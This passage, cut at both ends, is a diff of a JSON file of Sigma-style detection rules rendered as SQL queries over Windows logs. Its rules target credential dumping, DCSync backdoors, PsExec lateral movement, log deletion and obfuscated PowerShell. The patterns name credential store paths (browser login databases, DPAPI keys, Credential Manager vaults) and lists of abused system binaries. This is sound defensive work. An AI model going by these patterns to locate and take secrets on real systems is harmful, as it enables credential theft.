Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", - "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Addition of SID History to Active Directory Object", + "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "status": "stable", + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "author": "Thomas Patzke, @atc_project (improvements)", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1134.005" ], "falsepositives": [ - "Changes made to or by the local NTP service" + "Migration of an account into a new domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((Image LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_susp_add_sid_history.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", - "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "status": "test", + "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Unknown" + "If source account name is not an admin then its super suspicious" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_account_discovery.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", "status": "experimental", - "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": "File Deleted Via Sysinternals SDelete", - "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", "status": "test", - "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Legitime usage of SDelete" + "Linux hostnames composed of 16 characters." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "Backup Files Deleted", - "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", - "author": "frack113", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "Legitime usage" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_delete_win_delete_backup_file.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "PowerShell Console History Logs Deleted", - "id": "ff301988-c231-4bd0-834c-ac9d73b86586", + "title": "Access Token Abuse", + "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", "status": "experimental", - "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", + "author": "Michaela Adams, Zach Mathis", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.privilege_escalation", + "attack.t1134.001" ], "falsepositives": [ - "Unknown" + "Anti-Virus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_powershell_command_history.yml" + "filename": "win_security_access_token_abuse.yml" }, { - "title": "IIS WebServer Access Logs Deleted", - "id": "3eb8c339-a765-48cc-a150-4364c04652bf", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "During uninstallation of the IIS service", - "During log rotation" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_delete_win_delete_iis_access_logs.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "Tomcat WebServer Logs Deleted", - "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "status": "experimental", - "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "During uninstallation of the tomcat server", - "During log rotation" + "Unknown. Feedback welcomed." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_delete_tomcat_logs.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "EventLog EVTX File Deleted", - "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_delete_event_log_files.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", - "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Exclusion Set", + "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1562.001" ], "falsepositives": [ - "Possible FP during log rotation" + "Intended inclusions by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" - ], - "filename": "file_delete_win_delete_exchange_powershell_logs.yml" - }, - { - "title": "Suspicious Access To Browser Credential Files", - "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", - "author": "frack113", - "tags": [ - "attack.t1003", - "attack.credential_access" - ], - "falsepositives": [ - "Antivirus, Anti-Spyware, Anti-Malware Software", - "Backup software", - "Software installed on other partitions other than \"C:\\\"", - "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\') OR (FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR (Image = 'System' AND ParentImage = 'Idle')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_access_win_browser_credential_stealing.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Suspicious Access To Windows Credential History File", - "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Azure AD Health Service Agents Registry Keys Access", + "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "status": "test", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_access_win_susp_cred_hist_access.yml" + "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" }, { - "title": "Credential Manager Access", - "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", "tags": [ - "attack.t1003", - "attack.credential_access" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" ], - "filename": "file_access_win_credential_manager_stealing.yml" + "filename": "win_security_account_backdoor_dcsync_rights.yml" }, { - "title": "Suspicious Access To Windows DPAPI Master Keys", - "id": "46612ae6-86be-4802-bc07-39b59feb1309", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE 